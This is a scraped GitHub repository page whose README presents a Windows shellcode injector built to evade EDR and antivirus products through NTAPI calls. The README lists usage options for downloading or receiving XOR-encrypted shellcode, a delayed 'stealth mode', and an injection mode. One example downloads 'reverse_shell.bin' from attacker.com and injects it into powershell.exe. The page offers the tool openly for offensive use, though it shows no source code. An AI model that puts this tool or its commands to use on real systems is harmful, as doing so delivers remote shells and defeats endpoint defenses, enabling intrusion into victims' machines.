Skip to content

Inject shellcode to process using Windows NTAPI for bypassing EDRs and Antiviruses

License

Notifications You must be signed in to change notification settings

elddy/Windows-NTAPI-Injector

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

22 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Windows NTAPI shellcode injector

Inject shellcode from memory to process using Windows NTAPI for bypassing EDRs and Antiviruses

  • Download shellcode from URL
  • Listen and wait for shellcode

Usage

Usage:
        Injector.exe -u <URL> [-k <xor_key>]
        Injector.exe -p <PID/Process Name> -u <URL> [-k <xor_key>]
        Injector.exe -p <PID/Process Name> -l <LISTEN_PORT> [-k <xor_key>]
        Injector.exe -h
Options:
        -h       Show this menu.
        -u       URL to donwload shellcode from (Not listen mode).
        -p       PID/Process name to be injected (Optional).
        -l       Listen mode port (Not download mode).
        -k       XOR key to use for decryption.
        -s       Stealth mode - the decryption and injection will start after given seconds (Default 18).
        -m       Injection mode - NT or normal(VirtualAllocEx, WriteProcessMemory, CreateRemoteThread).

Examples

Download and inject to powershell.exe

injector.exe -u http://attacker.com/reverse_shell.bin -p powershell.exe

Wait for connection on port 8080, receive shellcode and inject to owned notepad.exe

injector.exe -l 8080

About

Inject shellcode to process using Windows NTAPI for bypassing EDRs and Antiviruses

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published